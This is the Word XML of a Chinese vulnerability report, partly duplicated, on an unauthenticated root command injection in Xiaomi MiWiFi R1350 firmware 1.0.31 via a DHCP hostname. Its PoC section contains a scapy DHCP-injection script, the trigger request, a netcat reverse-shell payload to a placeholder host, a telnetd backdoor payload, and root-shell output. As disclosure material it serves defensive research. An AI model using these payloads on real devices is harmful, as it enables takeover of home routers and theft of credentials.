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57E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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:highlight w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>小米 MiWiFi R1350 路由器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4556B8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厂商：小米（Xiaomi）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ED25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产品：小米 AIoT 路由器 R1350（AC1200）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DA07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固件版本：1.0.31（miwifi_r1350_firmware_7449d_1.0.31.bin，QSDK / OpenWrt，MIPS32 大端）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CEAB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漏洞类型：未授权操作系统命令注入（CWE-78）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B172A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概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067752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小米 MiWiFi R1350 路由器（固件 1.0.31）存在一个未授权命令注入漏洞。LAN 侧攻击者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无需任何认证、也无需知道管理员密码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，即可获得 root 权限的任意命令执行。触发注入的接口为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9731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GET /cgi-bin/luci/api/misns/sns_init?callback=x HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA6C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该路由以授权标志位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0x01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（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noauth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）注册，完全绕过 LuCI 的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sysauth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会话检查（见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luci/dispatcher.lua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中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_noauthAccessAllowed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，bit 0x01）。利用的前提是攻击者曾经从路由器获取过 DHCP 租约（任何 LAN 客户端默认如此），因为被注入的数据经由 DHCP 客户端主机名（hostname）传递。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629EB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漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355866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Web 栈为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nginx :80 → fastcgi（spawn-fcgi/fcgi-cgi，监听 127.0.0.1:8920）→ /www/cgi-bin/luci（Lua，LuCI dispatcher）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，以 root 身份运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E8E5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污点链（所有路径均相对于固件根目录）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2F4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污点源 —— DHCP 主机名。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攻击者控制的 DHCP option 12（host name）被 dnsmasq 原样写入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/tmp/dhcp.leases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（按空白分隔的第 4 个字段），不做任何字符过滤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020F8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62245" cy="3520440"/>
            <wp:effectExtent l="0" t="0" r="5080" b="381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A7D4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 1900000000 f8:fe:5e:46:33:f9 192.168.1.4 $(id&gt;/tmp/pwned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F34F5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读取 —— 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xiaoqiang/util/XQDeviceUtil.lua:122-157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（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getDHCPList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）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用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line:match("^(%d+) (%S+) (%S+) (%S+)")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解析每行租约；主机名字段接受任意非空白字符（包括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 ( ) { } | &amp; ; \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"` 等 shell 元字符），且不加修改地返回。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89CF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71770" cy="4279265"/>
            <wp:effectExtent l="0" t="0" r="5080" b="698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79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6DF03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汇聚点（Sink）—— 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luci/controller/api/misns.lua:92-109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（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snsInit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）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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692860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71770" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="5080" b="254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2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6C92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65420" cy="4155440"/>
            <wp:effectExtent l="0" t="0" r="1905" b="698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55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F7F6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misns.lua:17 entry({"api","misns","sns_init"}, call("snsInit"), (""), 206, 0x01) -- 0x01 = noauth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357740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misns.lua:103 local mac = luci.dispatcher.getremotemac()    -- 攻击者 IP -&gt; ARP -&gt; 其自身 MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26829E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misns.lua:105 local dhcpinfo = XQDeviceUtil.getDHCPDict()[mac] or {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757E1C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misns.lua:106 local dhcp = dhcpinfo["name"] or ""        -- 攻击者的 DHCP 主机名，无任何净化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C259D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misns.lua:107 local cmd = string.format("matool --method enc --params \"{\\\"mac\\\":\\\"%s\\\",\\\"dhcp\\\":\\\"%s\\\"}\"", mac, dhcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7F0E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misns.lua:108 result.clientinfo = LuciUtil.trim(LuciUtil.exec(cmd)) -- io.popen -&gt; /bin/sh -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F629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dhcp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被在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双引号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shell 字符串中插值且未做任何转义。同类的兄弟控制器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api/miats.lua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对同类参数使用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XQFunction._cmdformat()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净化（会转义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\ ` " $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）；而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misns.lua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漏掉了这个调用——这一遗漏正是根因。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2ADB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执行。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最终交给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/bin/sh -c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的命令为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB4B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matool --method enc --params "{\"mac\":\"f8:fe:5e:46:33:f9\",\"dhcp\":\"$(id&gt;/tmp/pwned)\"}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28263BE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由于 payload 位于双引号内，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$(...)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、反引号和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${...}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都会被 shell 展开。DHCP 主机名不能包含空白字符（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%S+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解析会将其截断），可用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${IFS}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代替空格。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72871D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漏洞证明（PoC）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC7B0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第 1 步 —— 将 payload 作为攻击机 DHCP 主机名植入（任何允许自定义 option-12 原始值的 DHCP 客户端均可；以下为 Linux 攻击机示例）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311F00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# 用 scapy 一次性发送（或者直接修改系统主机名后重新联网）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261BAE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python3 -c "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF134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from scapy.all import Ether/IP/UDP/BOOTP/DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C39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hostname = '\$(telnetd -p 1337 -l /bin/sh)' # 不能含空格：如有需要请用 \${IFS}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C89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dhcp = DHCP(options=[('message-type','discover'),(12,hostname),('param_req_list',[1,3,6,15]),'end'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FC4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sendp(Ether(dst='ff:ff:ff:ff:ff:ff')/IP(src='0.0.0.0',dst='255.255.255.255')/UDP(sport=68,dport=67)/BOOTP(chaddr=...)/dhcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A94C2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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685460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dnsmasq 会将该主机名原样写入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/tmp/dhcp.leases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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADEEE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第 2 步 —— 触发注入（无需认证；必须从植入主机名的同一台机器发起，因为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getremotemac()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会把请求来源 IP 映射为租约中的 MAC）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348924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GET /cgi-bin/luci/api/misns/sns_init?callback=poc HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C010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Host: 192.168.31.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B707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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA005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响应（处理器仍返回正常的 JSONP）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2987F6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poc({"deviceid":"","clientinfo":"","ssid":" 小米共享WiFi_","code":0});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B2E8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curl 一行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16762C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curl -s "http://&lt;router&gt;/cgi-bin/luci/api/misns/sns_init?callback=poc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774BB6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作为主机名的反弹 shell payload（该固件的 busybox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nc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没有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-e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选项）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ED67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# 双通道反弹 shell（稳定）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9A3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$(tail${IFS}-f${IFS}/dev/null|nc${IFS}&lt;LHOST&gt;${IFS}7411|/bin/sh|nc${IFS}&lt;LHOST&gt;${IFS}7412)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748FB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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3860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# 或者 telnetd 后门（原厂固件存在 /proc/xiaoqiang/ft_mode，因此 telnetd 可正常启动）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6878B3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$(telnetd${IFS}-p${IFS}1337${IFS}-l${IFS}/bin/sh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF35C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影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673017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任意 LAN 客户端（或任何能诱导某客户端获取 DHCP 租约的人，例如利用默认近乎开放的 Wi-Fi 配网窗口 / WPS）都可以 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root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身份执行任意命令——fastcgi 拉起的 Lua 后端以 root 运行——从而导致设备完全失陷：凭据窃取（已保存的 PPPoE/Wi-Fi 密码）、持久化后门、DNS 劫持以及向家庭内网横向渗透。全程无需任何认证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049E66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复现结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4C81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该漏洞已在 qemu-mips（用户态）+ chroot 模拟的固件环境中动态验证：原始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nginx → fcgi-cgi → LuCI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栈在 80 端口提供 HTTP 服务，并预先植入一条 DHCP 主机名租约：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364536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66055" cy="938530"/>
            <wp:effectExtent l="0" t="0" r="1270" b="444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38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C05E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42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:highlight w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>小米 MiWiFi R1350 路由器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A2A5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厂商：小米（Xiaomi）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D958D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产品：小米 AIoT 路由器 R1350（AC1200）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40411B4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固件版本：1.0.31（miwifi_r1350_firmware_7449d_1.0.31.bin，QSDK / OpenWrt，MIPS32 大端）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E535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漏洞类型：未授权操作系统命令注入（CWE-78）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDADF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概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7350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小米 MiWiFi R1350 路由器（固件 1.0.31）存在一个未授权命令注入漏洞。LAN 侧攻击者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无需任何认证、也无需知道管理员密码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，即可获得 root 权限的任意命令执行。触发注入的接口为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351A46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GET /cgi-bin/luci/api/misns/sns_init?callback=x HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1C84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该路由以授权标志位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0x01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（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noauth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）注册，完全绕过 LuCI 的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sysauth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会话检查（见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luci/dispatcher.lua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中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_noauthAccessAllowed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，bit 0x01）。利用的前提是攻击者曾经从路由器获取过 DHCP 租约（任何 LAN 客户端默认如此），因为被注入的数据经由 DHCP 客户端主机名（hostname）传递。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB00F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漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AA3F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Web 栈为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nginx :80 → fastcgi（spawn-fcgi/fcgi-cgi，监听 127.0.0.1:8920）→ /www/cgi-bin/luci（Lua，LuCI dispatcher）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，以 root 身份运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63834E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污点链（所有路径均相对于固件根目录）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1553C42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污点源 —— DHCP 主机名。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攻击者控制的 DHCP option 12（host name）被 dnsmasq 原样写入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/tmp/dhcp.leases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（按空白分隔的第 4 个字段），不做任何字符过滤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7163B9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62245" cy="3520440"/>
            <wp:effectExtent l="0" t="0" r="5080" b="381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91C6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 1900000000 f8:fe:5e:46:33:f9 192.168.1.4 $(id&gt;/tmp/pwned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A475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读取 —— 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xiaoqiang/util/XQDeviceUtil.lua:122-157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（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getDHCPList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）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用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line:match("^(%d+) (%S+) (%S+) (%S+)")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解析每行租约；主机名字段接受任意非空白字符（包括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 ( ) { } | &amp; ; \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"` 等 shell 元字符），且不加修改地返回。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B533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71770" cy="4279265"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6985"/>
            <wp:docPr id="6" name="图片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79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3FAC9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汇聚点（Sink）—— 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luci/controller/api/misns.lua:92-109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（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snsInit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）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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F629F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71770" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="8" name="图片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2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1ABC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65420" cy="4155440"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="9" name="图片 9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55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5DB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misns.lua:17 entry({"api","misns","sns_init"}, call("snsInit"), (""), 206, 0x01) -- 0x01 = noauth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062E4D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misns.lua:103 local mac = luci.dispatcher.getremotemac()    -- 攻击者 IP -&gt; ARP -&gt; 其自身 MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB069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misns.lua:105 local dhcpinfo = XQDeviceUtil.getDHCPDict()[mac] or {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF7D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misns.lua:106 local dhcp = dhcpinfo["name"] or ""        -- 攻击者的 DHCP 主机名，无任何净化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A293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misns.lua:107 local cmd = string.format("matool --method enc --params \"{\\\"mac\\\":\\\"%s\\\",\\\"dhcp\\\":\\\"%s\\\"}\"", mac, dhcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F49D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-- misns.lua:108 result.clientinfo = LuciUtil.trim(LuciUtil.exec(cmd)) -- io.popen -&gt; /bin/sh -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114C0EB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dhcp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被在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双引号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shell 字符串中插值且未做任何转义。同类的兄弟控制器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api/miats.lua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对同类参数使用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XQFunction._cmdformat()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净化（会转义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\ ` " $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）；而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misns.lua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漏掉了这个调用——这一遗漏正是根因。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC408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执行。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最终交给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/bin/sh -c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的命令为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251671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matool --method enc --params "{\"mac\":\"f8:fe:5e:46:33:f9\",\"dhcp\":\"$(id&gt;/tmp/pwned)\"}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C908C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由于 payload 位于双引号内，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$(...)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、反引号和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${...}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都会被 shell 展开。DHCP 主机名不能包含空白字符（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%S+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解析会将其截断），可用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${IFS}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代替空格。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAE15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漏洞证明（PoC）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F407C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第 1 步 —— 将 payload 作为攻击机 DHCP 主机名植入（任何允许自定义 option-12 原始值的 DHCP 客户端均可；以下为 Linux 攻击机示例）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687E14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# 用 scapy 一次性发送（或者直接修改系统主机名后重新联网）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713733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python3 -c "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DB81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from scapy.all import Ether/IP/UDP/BOOTP/DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC45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hostname = '\$(telnetd -p 1337 -l /bin/sh)' # 不能含空格：如有需要请用 \${IFS}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF80A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dhcp = DHCP(options=[('message-type','discover'),(12,hostname),('param_req_list',[1,3,6,15]),'end'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547B6B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sendp(Ether(dst='ff:ff:ff:ff:ff:ff')/IP(src='0.0.0.0',dst='255.255.255.255')/UDP(sport=68,dport=67)/BOOTP(chaddr=...)/dhcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE917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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1CE9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dnsmasq 会将该主机名原样写入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/tmp/dhcp.leases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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7C5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第 2 步 —— 触发注入（无需认证；必须从植入主机名的同一台机器发起，因为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getremotemac()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会把请求来源 IP 映射为租约中的 MAC）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199844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GET /cgi-bin/luci/api/misns/sns_init?callback=poc HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164CBB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Host: 192.168.31.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB2E7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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EECD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响应（处理器仍返回正常的 JSONP）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982D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poc({"deviceid":"","clientinfo":"","ssid":" 小米共享WiFi_","code":0});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4DA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curl 一行命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D933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curl -s "http://&lt;router&gt;/cgi-bin/luci/api/misns/sns_init?callback=poc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F13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作为主机名的反弹 shell payload（该固件的 busybox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nc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没有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-e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选项）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FED8B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# 双通道反弹 shell（稳定）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3512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$(tail${IFS}-f${IFS}/dev/null|nc${IFS}&lt;LHOST&gt;${IFS}7411|/bin/sh|nc${IFS}&lt;LHOST&gt;${IFS}7412)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FB6B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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF724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# 或者 telnetd 后门（原厂固件存在 /proc/xiaoqiang/ft_mode，因此 telnetd 可正常启动）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341485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$(telnetd${IFS}-p${IFS}1337${IFS}-l${IFS}/bin/sh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA897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影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E4BE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任意 LAN 客户端（或任何能诱导某客户端获取 DHCP 租约的人，例如利用默认近乎开放的 Wi-Fi 配网窗口 / WPS）都可以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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root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身份执行任意命令——fastcgi 拉起的 Lua 后端以 root 运行——从而导致设备完全失陷：凭据窃取（已保存的 PPPoE/Wi-Fi 密码）、持久化后门、DNS 劫持以及向家庭内网横向渗透。全程无需任何认证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBB04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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:highlight w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>复现结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7450E2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该漏洞已在 qemu-mips（用户态）+ chroot 模拟的固件环境中动态验证：原始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nginx → fcgi-cgi → LuCI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栈在 80 端口提供 HTTP 服务，并预先植入一条 DHCP 主机名租约：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C960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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="938530"/>
            <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
            <wp:docPr id="10" name="图片 10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38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F13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$ curl -s "http://192.168.1.5/cgi-bin/luci/api/misns/sns_init?callback=poc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B8A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poc({"deviceid":"","clientinfo":"","ssid":" 小米共享WiFi_","code":0});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7BFA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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4134D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$ cat /tmp/pwned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D1AC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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8096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此外还从模拟路由器向 Windows 攻击机弹回了交互式 root shell（双通道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nc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payload，主机名为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$(tail${IFS}-f${IFS}/dev/null|nc...|/bin/sh|nc...)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）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E51A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[+] cmd channel from ('192.168.1.5', 58744)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750E99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[+] out channel from ('192.168.1.5', 48154)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C2CC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=== SHELL OUTPUT ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B88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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F77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Linux iotseczone 6.8.0-136-generic ... mips GNU/Linux</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="56BF2D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===PWNED-BY-MISNS-SNS-INIT===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE33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42"/>
          <w:szCs w:val="42"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329C67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</w:p>
    <w:p w14:paraId="57E595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poc({"deviceid":"","clientinfo":"","ssid":" 小米共享WiFi_","code":0});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F55D1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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088835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$ cat /tmp/pwned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4E12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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD970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此外还从模拟路由器向 Windows 攻击机弹回了交互式 root shell（双通道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nc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 xml:space="preserve"> payload，主机名为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F3F4F4"/>
        </w:rPr>
        <w:t>$(tail${IFS}-f${IFS}/dev/null|nc...|/bin/sh|nc...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:highlight w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516910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[+] cmd channel from ('192.168.1.5', 58744)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC54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[+] out channel from ('192.168.1.5', 48154)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A572D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=== SHELL OUTPUT ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C74C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uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367E8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Linux iotseczone 6.8.0-136-generic ... mips GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641D1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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="23241F"/>
        </w:rPr>
        <w:t>===PWNED-BY-MISNS-SNS-INIT===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B793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 w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="408CC2B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="标准粗黑" w:hAnsi="标准粗黑" w:eastAsia="标准粗黑" w:cs="标准粗黑"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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1" w:fontKey="{B3D651DE-865C-45E0-BCD8-CCB1ED59D7F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9FA5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8069FA5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602615C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86026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E029826"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9E02982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7928425"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C792842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539F8D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D539F8D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FF18FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFF1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83CC25A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="083CC25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2F42DF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12F42DF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64C18D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="164C18D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60F5907"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="360F590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2F29EA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="72F29EA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A59C14E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A59C14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0"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="0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816D4"/>
    <w:rsid w:val="284502B4"/>
    <w:rsid w:val="52F52E3D"/>
    <w:rsid w:val="734A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b/>
      <w:bCs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2025-02-10T06:03:00Z</dcterms:created>
  <dc:creator>11226</dc:creator>
  <cp:lastModifiedBy>cinqseptfive</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-17T02:00:01Z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783E61DC5BDD4CA294A964ED3C1204EC_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiYjkyZmNhZmMwYTRkMzdjNDc0ZDBiODA4ZTNmNjg2YzYiLCJ1c2VySWQiOiIxNDQ5MzUxNjY0In0=</vt:lpwstr>
  </property>
</Properties>
</file>